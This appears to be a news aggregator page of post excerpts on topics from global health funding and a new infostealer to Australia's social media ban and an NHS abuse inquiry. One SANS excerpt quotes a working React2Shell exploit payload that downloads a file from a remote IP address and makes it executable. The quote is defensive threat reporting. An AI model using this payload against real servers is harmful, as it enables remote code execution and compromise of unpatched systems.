Latest posts

All
fashion
lifestyle
sports
tech

Trending News

Popular

U.S. Global Health Country-Level Funding Tracker
SantaStealer is Coming to Town: A New, Ambitious Infostealer Advertised on Underground Forums
This Startup Wants to Build Self-Driving Car Software—Super Fast
More React2Shell Exploits CVE-2025-55182 – SANS ISC

U.S. Global Health Country-Level Funding Tracker

This tracker provides U.S. global health funding data by program area and country. It includes Congressionally appropriated (planned) funding amounts from FY 2006 – FY 2023, as well as obligations and disbursements from FY 2006 – FY 2025 (FY 2025 data are partially reported). Data were obtained from ForeignAssistance.gov (see About This Tracker below for…

Read More

SantaStealer is Coming to Town: A New, Ambitious Infostealer Advertised on Underground Forums

Summary Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.” The…

Read More

More React2Shell Exploits CVE-2025-55182 – SANS ISC

Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload: ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”0″ {“then”:”$1:__proto__:then”,”status”:”resolved_model”,”reason”:-1,”value”:”{\”then\”:\”$B1337\”}”,”_response”:{“_prefix”:”process.mainModule.require(‘http’).get(‘http://51.81.104.115/nuts/poop’,r=>r.pipe(process.mainModule.require(‘fs’).createWriteStream(‘/dev/shm/lrt’).on(‘finish’,()=>process.mainModule.require(‘fs’).chmodSync(‘/dev/shm/lrt’,0o755))));”,”_formData”:{“get”:”$1:constructor:constructor”}}} ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”1″ “$@0″ ——WebKitFormBoundaryxtherespoopalloverme ——WebKitFormBoundaryxtherespoopalloverme– To make…

Read More

15th December – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 15th December, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The Indian government confirmed cyber incidents involving GPS spoofing at seven major airports, including Delhi, Mumbai, Kolkata, and Bengaluru. The attack affected aircrafts using GPS-based landing procedures. Despite signal disruption to navigation…

Read More

What even is the AI bubble?

Still, given the level of spending on AI, it still needs a viable business model beyond subscriptions, which won’t be able to  drive profits from billions of people’s eyeballs like the ad-driven businesses that have defined the last 20 years of the internet. Even the largest tech companies know they need to ship the world-changing…

Read More

Australia social media ban: Why isn’t gaming included?

Katy WatsonAustralia correspondent , Perth Getty Images Critics say gaming platforms should be included in Australia’s ban on social media for under-16s Wednesday afternoons have become a ritual for 15-year-old Sadmir Perviz. It’s a circuitous route from home in Perth to the Fiona Stanley Hospital – but it’s worth it, he says, to sit down…

Read More

NHS units investigated for historical child abuse in Sussex

Nick JohnsonSouth East investigations team BBC Det Insp Cheryl Lewendon suspects more victims could come forward Warning – this story contains distressing content and references to alleged child abuse Police investigating historical child abuse at two former NHS mental health units in West Sussex say they have spoken to 12 alleged victims – and believe…

Read More